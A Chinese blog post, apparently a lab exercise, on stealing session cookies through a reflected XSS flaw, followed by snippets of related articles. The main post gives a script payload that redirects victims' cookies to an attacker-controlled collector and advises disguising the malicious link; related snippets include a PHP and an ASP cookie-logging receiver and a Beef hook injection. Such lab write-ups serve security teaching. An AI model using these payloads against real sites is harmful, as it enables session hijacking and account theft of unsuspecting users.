【xss漏洞】cookie获取与利用实验

最新推荐文章于 2022-04-23 17:23:10 发布
最新推荐文章于 2022-04-23 17:23:10 发布
阅读量417 收藏 2
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43696861/article/details/105602691
版权

一、相关函数

方法解释
document.location=‘url’转跳指定url
document.cookie返回该页面cookie值

二、构建payload

<script>document.location='http://192.168.56.132/pkxss/xcookie/cookie.php?cookie='+document.cookie;</script>

三、利用反射型xss构建url

3.1 输入构造的payload(需要先修改可输入的长度限制)

3.2将url伪装之后,发送出去

四、获取到的cookie

也森
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS平台获取cookie
weixin_43387567的博客
04-02 4294
今天,我学习xss平台获取cookie的时候,由于各种毛病获取不到cookie。现在复现成功了,所以把过程写出来,记录一下过程,希望对入门的朋友有用。 首先我们得自己搭建环境,互联网是非常危险的。 我平时都是用docker搭建需要的坏境,非常简单。 yum install -y docker #安装docker service docker start #启动docker docker sea...
XSS漏洞利用——获取cookie
cxrpty的博客
02-20 1742
实验环境:DVWA 实验步骤: 一、在服务器创建一个1.php文件获取cookie值,并将cookie值写入1.txt中 php代码如下: <?php $file=fopen("1.txt","a"); if($_GET['cookie']){ $cookie=$_GET['cookie']; fputs($file,"$cookie\r\n"); } ?> ...
搭建XSS Cookie 邮件接收
weujie
07-25 806
初接触这行学习时,无非觉得Xss就是alert及script钓鱼,(以至于我还是那么菜)以至于没怎么展开学习,现如今随着学习的深入后,发现Xss的世界是如此的有意思; 缘由是在网上找了很多在线平台,发现邮件功能都没法使用,也不知道是我钓鱼还是网站钓鱼;( 没办法只能自己搭建一个。 搭建XSS Cookie 邮件接收+端口映射环境0x01 下载0x02 邮件服务配置0x03 sandmail 配置0x04 php配置0x05 代码0x06 映射端口 环境 环境 :phpstudy、Windos、花生壳、.
简单xss接收cookie平台的搭建以及xsscookie的一些总结
..
01-27 3966
接收平台的搭建_BlueLotus_XSSReceiver 这个是搭建教程: 打Cookie小工具_BlueLotus_XSSReceiver 链接:百度网盘 请输入提取码提取码:tdoj 我是将其搭在服务器上,模拟最真实的攻击环境。搭在服务器上需要几个条件,一是得有apache服务,二是得有php环境。 Linux环境搭建:CentOs + Apache + MySQL + PHP - 云+社区 - 腾讯云 下面说一下在搭建过程中踩的坑。 一、在上传的时候直接上传解压好的_Blue...
漏洞复现篇——利用XSS漏洞获取cookie
爱国小白帽
02-20 3022
实验环境: PHPstudy 火狐浏览器、IE DVWA靶场
web安全技术-实验七、跨站脚本攻击(xss)(反射型).doc
08-20
实验中,通过以下几种方式检测和利用XSS漏洞: 1. `<script>alert(‘检测 XSS’)</script>`:这段代码会在页面加载时弹出一个包含文本"检测 XSS"的警告框,以此来验证是否能成功执行JavaScript。 2. `(document....
实验十一-网站程序与网站安全.pdf
12-03
防止XSS攻击的方法包括正确地编码输出、使用HTTPOnly Cookie防止会话令牌被盗,以及利用Content Security Policy (CSP)限制可执行脚本的来源。 4. **跨站请求伪造(CSRF)**:CSRF攻击利用用户已登录的身份执行非预期...
PHP开发漏洞环境(SQL注入+文件上传+文件下载+XSS+万能密码+session/cookie+购物逻辑漏洞的学习等等)
最新发布
05-08
4. XSS(跨站脚本)攻击:XSS漏洞允许攻击者在用户的浏览器上执行恶意JavaScript代码。常见的类型有存储型、反射型和DOM型XSS。攻击者可以通过注入脚本窃取用户的Cookie、会话信息,或者进行钓鱼攻击。 5. 万能密码...
2021xx0326 袁卓霞反射型XSS实验报告.docx
10-22
在本次实验中,袁卓霞同学通过一系列步骤深入理解和实践了反射型XSS攻击,并展示了如何利用这种攻击手段获取用户的Cookie信息。 首先,实验目的是让学生理解XSS攻击的概念、原理及其形成条件,以及攻击过程。为了...
Web应用安全:XSS通过JavaScript攻击(实验).docx
06-20
1. 在一个已知存在XSS漏洞的站点(如pikachu)上,利用XSS留言板,插入包含Beef链接的JavaScript脚本`地址:3000/hook.js></script>`。 2. 当其他用户访问含有恶意脚本的页面时,Beef-xss会捕获到连接,并能控制用户...
23、渗透测试笔记_XSS漏洞利用(打cookie_键盘记录)_20191121
__Qian的博客
11-21 1360
1、利用XSScookie 打开http://xss.fbisb.com,注册账号登入 点击创建项目,点击下一步 选择默认模块,选择keepsession,点击下一步 将xss注入代码复制 打开dvwa靶机,登录后选择xss stored,将复制的xss注入代码复制到message中,点击sign guestbook 再次点击xss stored 查看...
XSS漏洞利用cookie获取
good good study
08-01 9965
目录 环境搭建 盗取cookie 关于documen.cookie获取不到cookie httponly 刚学习xss的时候我们都知道只要能弹窗就肯定存在xss漏洞,也知道xss是可以盗取cookie的,但是至于怎么盗取cookie其实很多同学可能还不是很清楚,也可能并没有实质性的去探讨过这个问题。 环境搭建 思路:攻击者本地搭建的一个网站存在xss漏洞,并且在与网站同一个ip的服务器中使用浏览器进行了登录,此时访问了一个恶意链接,这个恶意链接,直接将cookie获取并发送到hacker服务
xss漏洞-DVWA跨站攻击盗取用户cookie
CKT_GOD的博客
09-18 3534
程Kaedy.cn-www.kaedy.cn XSS跨站脚本攻击介绍 跨站脚本攻击英文全称为(Cross site Script)缩写为 CSS,但是为了和层叠样式表(Cascading Style Sheet)CSS 区分开来,所以在安全领域跨站脚本攻击叫做 XSS XSS 攻击简介 XSS 攻击通常指黑客通过往 Web 页面中插入恶意 Script 代码,当用户访问网页时恶意代码在用户的 浏览器中被执行,从而劫持用户浏览器窃取用户信息。 1、黑客加在特定 web 页面 index.html 中,加入
关于document.cookie的使用(转)
weixin_33881041的博客
12-22 1051
关于document.cookie的使用 ...
XSS漏洞利用
LizePing_的博客
07-29 4739
XSS利用利用XSS窃取cookieXSS修改网页XSS获取用户信息XSS+CSRF 组合拳盲打XSS(Blind XSS)利用开启HttpOnly下的利用1.phpinfo页2.框架钓鱼3.跳转钓鱼4.历史密码5.获取源码6.通过xss伪造oauth等授权请求,远程登录其它 利用XSS窃取cookie 窃取cookiexss利用最常见的手段,攻击者有了cookie就相当于拥有了“管理员”身份。 通常需要配合xss平台来进行攻击,当被攻击者访问到有恶意代码的页面,他的cookie就会被发送到xss平台。
3-5通过XSS获取cookie以及XSS后台管理系统的使用
山兔的博客
04-23 3882
XSS漏洞测试:cookie获取和钓鱼攻击演示  XSS漏洞测试:cookie的窃取和利用 同时讲到get型xss利用,post型xss利用XSS漏洞测试:钓鱼攻击  XSS漏洞测试:xss获取用户键盘记录 让大家更好的理解xss的危害以及原理 案例1:xss如何获取cookie? GET型XSS利用cookie获取 pkxss管理后台使用介绍 在源码包里面,有一个pkxss,我们可以把这个目录,单独的放在某个目录下面,这个东西其实是一个可以独立使用的后台,我们可以单独的把他放在站点目录下
利用XSS窃取用户Cookie
Monsterlz123的博客
07-20 7124
XSS利用XSS窃取用户Cookie Hello,各位小伙伴周六愉快。 晃眼之间一周又快要过去了,时间是不等人滴~~ 这周准备连发三篇XSS相关内容,两篇实战,一篇总结。 然后XSS漏洞部分就暂时完结啦~~ 今天我们来看看怎么利用XSS窃取用户cookie吧。 一、实验概述 实验拓扑: XSS的用途之一就是窃取用户的cookie,攻击者利用XSS在网站中插入恶意脚本,一旦用户访问该网页...
XSS获取cookie利用
kuxing100的专栏
07-11 1822
获取cookie利用代码cookie.asp xx msg = Request("msg")   //获取提交过来的msg变量,也就是cookie值 set fs = server.CreateObject("scripting.filesystemobject")//创建一个fs对象 set thisfile = fs.OpenTextFile(t
XSS攻击:获取用户的cookie(post方式)
weixin_43726152的博客
05-07 1534
    上一篇我们聊到的get方式,攻击者是制作一个让表单填写好值的链接让用户去点击。     但是当表单的提交方式为post,攻击者不能直接制作一个恶意链接让用户触发获取cookie的js脚本。这时候攻击者会制作一个新的链接,让用户点击后能够默认填写好值后自动提交。 下面我们来看看代码: <html> &...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值